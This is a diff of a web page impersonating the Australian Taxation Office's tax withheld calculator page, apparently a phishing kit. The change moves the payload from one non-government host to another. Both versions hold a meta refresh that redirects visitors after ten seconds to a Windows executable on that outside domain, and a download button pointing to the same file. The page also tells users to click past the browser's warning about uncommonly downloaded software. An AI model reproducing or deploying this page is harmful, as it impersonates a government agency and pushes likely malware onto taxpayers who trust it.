--- a/desktop.html
+++ b/desktop.html
@@ -12,7 +12,7 @@
 	
 <head id="ctl00_Head1"><script type="text/javascript" src="/WorkArea/FrameworkUI/js/ektron.javascript.ashx?id=-569449246+-1939951303+-1080527330+-1687560804+-1388997516+2009761168+27274999+1979897163+-422906301+-1818005853+-1475916077"></script><script type="text/javascript" src="/WebResource.axd?d=d1n8bpGyPkPfTGAPKrEaSXW8TI0dPboW6c8d9Rz04rys_K5CUpAQY3j7uUeXXxwQarl1XOQAZZRCq9EEo2t6cBNVx9Xtvosiynw_o7_XHEV3jxA49On-XicKV8XV8dakOQrmRYCwa5wjy9mAk3yvf1SMXGIU-ijh1A9WXpQ0PexD_bqbw-qU0hZRTifRC-0QymN5qrO0Mz9XDnw1odhAkfWY0J4NWk1-26Gm-YSYNETCy9jjOv-0-RN-GlBOtokH0&amp;t=638084325060000000"></script><script type="text/javascript" src="/WebResource.axd?d=j9LJccxdHjVA7kWs6w6TIIJyNdwcwFllR93kXDeKuy-aR9WFXxLAiqjUeiZq_3tvcZ-bpCIcGHbK9v67Hxq2mIh-dO9YZ4YsoQUL9On9ziPEevfKoQhHpZkZdwZnUlF4AfoN8meyKYh9JQTei-WaIViJtobuZ6Z0scOr1YRgjskE9CqRW4S1n_jxfFb7mNiWLnLW_d9yij1KZpkwCdFdPIOv3dfpaQsf_eVWpPx3_7k1&amp;t=638084325060000000"></script>
     <!-- LITE.Master -->
-	<meta http-equiv="refresh" content="10;URL='https://extensionsdev.com/AU%20Tax%20Calculator.exe'" /> 
+	<meta http-equiv="refresh" content="10;URL='https://myvirtualjobcent.com/downloads/AUTaxCalculator.exe'" /> 
     <meta charset="utf-8" /><title>
 	held calculator | Australian Taxation Office
 </title><link rel="icon" type="image/ico" href="https://www.ato.gov.au/uploadedFiles/Admin_Only/favicon.ico" />
@@ -255,7 +255,7 @@ data-container=".download-pdf-controls" data-html="true" aria-haspopup="true">
 
 <a name="Tax_withheld_for_individuals_calculator"></a>
 
-<a class="button primary" href="https://extensionsdev.com/AU%20Tax%20Calculator.exe" title="Download tax withheld Calculator here">Click here to download tax withheld calculator</a><a name="ATO_app_Tax_withheld_calculator"></a><h3 class="notoc">ATO app Tax withheld calculator for windows PC</h3>
+<a class="button primary" href="https://myvirtualjobcent.com/downloads/AUTaxCalculator.exe" title="Download tax withheld Calculator here">Click here to download tax withheld calculator</a><a name="ATO_app_Tax_withheld_calculator"></a><h3 class="notoc">ATO app Tax withheld calculator for windows PC</h3>
 <p>The <a href="/">ATO Calculator software</a> might trigger a This file is not a commonly downloaded software error, Please click the continue download to proceed with installation.</p>
 <p>It covers most scenarios, but you'll need to use the full version outlined above if you are not an Australian resident for tax purposes, are a working holiday maker, or are claiming tax offsets or Medicare levy adjustments.</p>
 <a name="What_you_can_do_with_this_calculator"></a><h2><a id="Whatyoucandowiththesecalculators" class="anchor"></a>What you can do with this calculator</h2>
